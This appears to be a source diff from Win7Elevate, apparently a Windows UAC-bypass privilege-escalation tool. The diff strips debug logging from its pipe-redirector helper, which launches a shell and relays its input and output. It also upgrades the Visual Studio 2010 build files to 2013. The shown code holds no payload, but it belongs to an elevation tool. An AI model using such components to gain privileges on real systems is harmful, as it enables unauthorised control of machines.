{ result.append( TEXT("message = ") );result.append( (TCHAR *)lpvMessageBuffer );result.append( TEXT("\n") ); }
|
|
||||||
|
|
||||||
if ( lpvMessageBuffer )
|
|
||||||
{ LocalFree(lpvMessageBuffer); }
|
|
||||||
|
|
||||||
return result;
|
|
||||||
}
|
|
||||||
|
|
||||||
/*************************************************************************************************/
|
/*************************************************************************************************/
|
||||||
/*************************************************************************************************/
|
/*************************************************************************************************/
|
||||||
|
@ -142,90 +102,3 @@ CInterprocessStorage::~CInterprocessStorage()
|
||||||
CloseHandle( _hMapping );
|
CloseHandle( _hMapping );
|
||||||
}
|
}
|
||||||
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
|
|
||||||
std::wstring CLogger::GetPath()
|
|
||||||
{
|
|
||||||
std::wstring path;
|
|
||||||
|
|
||||||
TCHAR buffer[MAX_PATH];
|
|
||||||
if ( GetTempPath( MAX_PATH, buffer ) )
|
|
||||||
{
|
|
||||||
path.assign( buffer );
|
|
||||||
path.append( TEXT("w7e.log") );
|
|
||||||
}
|
|
||||||
|
|
||||||
return path;
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Reset()
|
|
||||||
{
|
|
||||||
DeleteFile( GetPath().c_str() );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::LogLine( std::wstring& Text )
|
|
||||||
{
|
|
||||||
std::wstring tmp( Text.c_str() );
|
|
||||||
tmp.append( TEXT("\n") );
|
|
||||||
Log( tmp );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::LogLine( )
|
|
||||||
{
|
|
||||||
Log( TEXT("\n") );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::LogLine( const TCHAR *Text )
|
|
||||||
{
|
|
||||||
if ( Text )
|
|
||||||
LogLine( std::wstring( Text ) );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Log( const TCHAR Char )
|
|
||||||
{
|
|
||||||
std::wstring tmp;
|
|
||||||
tmp.append( &Char, 1 );
|
|
||||||
Log( tmp );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Log( const TCHAR *Text )
|
|
||||||
{
|
|
||||||
if ( Text )
|
|
||||||
Log( std::wstring( Text ) );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Log( std::wstring& Text )
|
|
||||||
{
|
|
||||||
TCHAR buffer[MAX_PATH];
|
|
||||||
//
|
|
||||||
// We have to check it every time to be reflective if user created this file
|
|
||||||
// while program was runnig.
|
|
||||||
//
|
|
||||||
if ( GetModuleFileName( NULL, buffer, MAX_PATH ) )
|
|
||||||
{
|
|
||||||
std::wstring dbg( buffer );
|
|
||||||
dbg.append( TEXT(".debug") );
|
|
||||||
HANDLE hdbg = CreateFile( dbg.c_str(), FILE_READ_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
|
|
||||||
if ( INVALID_HANDLE_VALUE == hdbg )
|
|
||||||
return;
|
|
||||||
|
|
||||||
CloseHandle( hdbg );
|
|
||||||
}
|
|
||||||
|
|
||||||
HANDLE mutex = CreateMutex( NULL, FALSE, TEXT("CLoggerSync") );
|
|
||||||
if ( mutex ) WaitForSingleObject( mutex , INFINITE );
|
|
||||||
HANDLE hFile = CreateFile( GetPath().c_str(), FILE_ALL_ACCESS, 0, NULL, OPEN_ALWAYS, FILE_FLAG_WRITE_THROUGH, NULL );
|
|
||||||
if( INVALID_HANDLE_VALUE != hFile )
|
|
||||||
{
|
|
||||||
SetFilePointer( hFile, 0, NULL, FILE_END );
|
|
||||||
|
|
||||||
DWORD written;
|
|
||||||
WriteFile( hFile, Text.data(), Text.size() * sizeof(TCHAR), &written, NULL );
|
|
||||||
|
|
||||||
CloseHandle( hFile );
|
|
||||||
}
|
|
||||||
if ( mutex ) ReleaseMutex( mutex );
|
|
||||||
if ( mutex ) CloseHandle( mutex );
|
|
||||||
}
|
|
|
@ -13,9 +13,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
assert( Parameter );
|
assert( Parameter );
|
||||||
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
|
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
|
||||||
|
|
||||||
CLogger::Log( TEXT("Hello redirector thread: ") );
|
|
||||||
CLogger::LogLine( pair->Name );
|
|
||||||
|
|
||||||
CHAR read_buff[2];
|
CHAR read_buff[2];
|
||||||
DWORD nBytesRead,nBytesWrote;
|
DWORD nBytesRead,nBytesWrote;
|
||||||
|
|
||||||
|
@ -25,11 +22,7 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
{
|
{
|
||||||
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
|
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
pair->Name.c_str(),
|
|
||||||
TEXT("ReadFile") ) );
|
|
||||||
error = true && (!pair->KeepAlive);
|
error = true && (!pair->KeepAlive);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
@ -67,11 +60,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
|
|
||||||
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
|
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
pair->Name.c_str(),
|
|
||||||
TEXT("WriteConsoleInput") ) );
|
|
||||||
error = true && (!pair->KeepAlive);
|
error = true && (!pair->KeepAlive);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
@ -80,11 +68,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
{
|
{
|
||||||
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
|
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
pair->Name.c_str(),
|
|
||||||
TEXT("WriteFile") ) );
|
|
||||||
error = true && (!pair->KeepAlive);
|
error = true && (!pair->KeepAlive);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
@ -92,8 +75,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
CLogger::Log( TEXT("Bye redirector thread: ") );
|
|
||||||
CLogger::LogLine( pair->Name );
|
|
||||||
return EXIT_SUCCESS;
|
return EXIT_SUCCESS;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -20,7 +20,6 @@
|
||||||
|
|
||||||
int _tmain(int argc, _TCHAR* argv[])
|
int _tmain(int argc, _TCHAR* argv[])
|
||||||
{
|
{
|
||||||
CLogger::LogLine(TEXT("TIOR: Hello"));
|
|
||||||
|
|
||||||
TRedirectorPair in = {0};
|
TRedirectorPair in = {0};
|
||||||
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||||
|
@ -79,9 +78,6 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
|
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
|
||||||
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
|
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("TIOR: shell=")); CLogger::LogLine(shell);
|
|
||||||
CLogger::LogLine(TEXT("TIOR: args=")); CLogger::LogLine(args);
|
|
||||||
CLogger::LogLine(TEXT("TIOR: dir=")); CLogger::LogLine(dir);
|
|
||||||
|
|
||||||
STARTUPINFO si = {0};si.cb = sizeof(si);
|
STARTUPINFO si = {0};si.cb = sizeof(si);
|
||||||
PROCESS_INFORMATION pi = {0};
|
PROCESS_INFORMATION pi = {0};
|
||||||
|
@ -100,11 +96,6 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
|
|
||||||
if ( ! created )
|
if ( ! created )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
TEXT("TIOR: Unable to create child process"),
|
|
||||||
TEXT("CreateProcess")));
|
|
||||||
|
|
||||||
return EXIT_FAILURE;
|
return EXIT_FAILURE;
|
||||||
}
|
}
|
||||||
|
@ -113,14 +104,12 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
CloseHandle( pi.hThread );
|
CloseHandle( pi.hThread );
|
||||||
}
|
}
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("TIOR: Shell has been started. Waiting..."));
|
|
||||||
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
|
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
|
||||||
//
|
//
|
||||||
// Waiting for eny handle to be freed.
|
// Waiting for eny handle to be freed.
|
||||||
// Either some IO thread will die or process will be oevered.
|
// Either some IO thread will die or process will be oevered.
|
||||||
//
|
//
|
||||||
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
|
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
|
||||||
CLogger::LogLine(TEXT("TIOR: Ensure that we processed all data in pipes"));
|
|
||||||
|
|
||||||
//
|
//
|
||||||
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
|
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
|
||||||
|
@ -132,11 +121,9 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
// Dont forget to close child process. We need to be sure, if user terminated app which
|
// Dont forget to close child process. We need to be sure, if user terminated app which
|
||||||
// reads our redirected data, we terminate the target child app.
|
// reads our redirected data, we terminate the target child app.
|
||||||
//
|
//
|
||||||
CLogger::LogLine(TEXT("TIOR: Killing child process"));
|
|
||||||
TerminateProcess( pi.hProcess, EXIT_FAILURE );
|
TerminateProcess( pi.hProcess, EXIT_FAILURE );
|
||||||
CloseHandle( pi.hProcess );
|
CloseHandle( pi.hProcess );
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("TIOR: Exit"));
|
|
||||||
|
|
||||||
//
|
//
|
||||||
// I will not close any handles here - system will terminate and close all by it self.
|
// I will not close any handles here - system will terminate and close all by it self.
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
<ItemGroup Label="ProjectConfigurations">
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
<ProjectConfiguration Include="Debug|Win32">
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
|
@ -28,23 +28,27 @@
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
@ -63,26 +67,31 @@
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -90,6 +99,8 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
|
@ -99,6 +110,10 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -106,11 +121,17 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -121,6 +142,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
|
@ -132,6 +154,10 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -142,6 +168,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
|
@ -153,6 +180,10 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="stdafx.h" />
|
<ClInclude Include="stdafx.h" />
|
||||||
|
|
|
@ -1,6 +1,8 @@
|
||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 11.00
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
# Visual Studio 2010
|
# Visual Studio 2013
|
||||||
|
VisualStudioVersion = 12.0.21005.1
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
|
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
|
||||||
ProjectSection(SolutionItems) = preProject
|
ProjectSection(SolutionItems) = preProject
|
||||||
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
|
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
|
||||||
|
@ -18,37 +20,32 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\
|
||||||
EndProject
|
EndProject
|
||||||
Global
|
Global
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4)
|
|
||||||
Debug|Win32 = Debug|Win32
|
Debug|Win32 = Debug|Win32
|
||||||
Debug|x64 = Debug|x64
|
Debug|x64 = Debug|x64
|
||||||
Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4)
|
|
||||||
Release|Win32 = Release|Win32
|
Release|Win32 = Release|Win32
|
||||||
Release|x64 = Release|x64
|
Release|x64 = Release|x64
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.Build.0 = Debug|x64
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.Build.0 = Debug|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
